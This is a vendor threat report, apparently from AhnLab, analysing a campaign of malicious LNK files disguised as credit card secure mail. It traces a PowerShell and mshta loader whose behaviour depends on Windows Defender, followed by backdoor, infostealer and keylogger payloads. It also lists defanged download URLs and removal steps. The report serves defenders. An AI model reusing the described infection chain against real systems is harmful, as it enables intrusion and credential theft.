Don’t trust ‘secure mail’! malicious Files Impersonating Credit Card Companies Are Being Distributed

ahnLab recently confirmed the distribution of malicious files disguised as security emails from a major credit card company in Korea. this attack has a similar flow to the Kimsuky group’s past malicious LNK distribution case of disguising password files, but it is characterized by a change in the command execution of the initial LNK file. in particular, the execution of additional files and malicious files and the behavior of the malicious files changed depending on whether the security service of the infected environment was enabled or disabled. let’s take a look at the main behavior of this case and user precautions.

malicious Behavior Depending on Whether Security Service is Enabled or Not

The malicious LNK file contains syntax to execute the mshta command through PowerShell. when the file is executed, an HTA file that exists at a specific address is executed via mshta.exe, which contains obfuscated VBScript code. it then downloads and executes a decoy document that looks like a legitimate document to lower the user’s suspicion.

[Figure 1] Obfuscated VBScript

The malware then checks whether the Windows Defender security service is running or not, and then downloads and executes additional files in different ways depending on the environment.

In environments where Windows Defender Service is running, the malware uses Curl to download the pipe.log file from the specified address to the %LocalAppData% Path. the file is encrypted with AES, decrypted, saved as pipe.zip, and then decompressed.

Inside pipe.zip, there are 1.log, 1.ps1, and 2.log files as shown in Figure 2. they perform Information Theft and backdoor operations, read file contents and execute Base64 decoding results in memory, keylogging, and clipboard Data collection, respectively.

[Figure 2] Inside the pipe.ZIP file

file Name	function
1.log	Performs Information Theft and backdoor functions (Base64 encoded form)
1.ps1	Takes a file name as an argument, reads the contents of the file, and executes the Base64 decoding result in memory execution using the
2.log	Performs keylogging and Clipboard Data stealing functions (Base64 encoding)

[Table 1] Internal files of pipe.zip

On the other hand, if Windows Defender Service is stopped, download user.txt and sys.log files in %LOCALAPPDATA% Path. the sys.log file is decrypted using the embedded AES key and saved as sys.dll, which is then loaded via rundll32. Sys.dll is a downloader malware, which stops running in VBox and VM environments.

Decrypting the encrypted Data contained in the %LocalAppData%\user.txt file reveals three URLs, each of which downloads additional malicious files to the %LocalAppData% Path.

download URL	save Path
Hxxps://drive.google[.]com/uc?export=download&id=1veetviG********	LOCALAPPDATA%\notepad.log
Hxxps://drive.google[.]com/uc?export=download&id=1PTs95g********	LOCALAPPDATA%\net
Hxxps://drive.google[.]com/uc?export=download&id=1EkyeoS********	%LOCALAPPDATA%\app

key malicious features

In this attack, several additional malicious components are executed depending on the infection environment, and each file is confirmed to perform backdoor or Information Theft functions.

Among the additional malicious files, notepad.log is a backdoor type of malware that performs functions such as remote command execution, collecting file and directory information, downloading and uploading files, uploading host information, and collecting browser information. it also explores Paths related to browser extensions and cryptocurrency wallets, downloads remote management tool (MeshAgent) configuration files, and performs keylogging and clipboard data collection.

Another malicious file, net, is an Infostealer-type malware, which is analyzed to steal Chrome and Firefox browser account information and mail client account information such as Thunderbird, Group Mail, and IncrediMail.

[Figure 3] Part of the NET file code

APP is also an Infostealer malware. this file scans the chrome.exe process and then injects decrypted code into the main Chrome process without –type= on the command line to steal cookie information of Chrome, Edge, and Whale browsers.

[Figure 4] Part of the APP file code

countermeasures

This case is noteworthy because it tricks users into executing malicious files by mistaking them for secure mail from a popular credit card company. users should check the source and file type of any file that looks like a secure email, and avoid running suspicious files.

AhnLab recommends the following steps to take in response to this case.

1. check the registered registry

Check the registered registry and delete any suspicious registry entries.

2. delete suspicious files

If files such as 1.log, 1.ps1, 2.log exist in the %TEMP% or %LOCALAPPDATA%\pipe Path, they may be malicious files and should be deleted immediately.

This attack case utilizes bait files disguised as legitimate documents and performs different malicious behaviors depending on whether the security service is enabled or disabled. users should be extremely cautious when opening secure emails or related files claiming to be from a card company, and organizations should check for suspicious registry and file creation.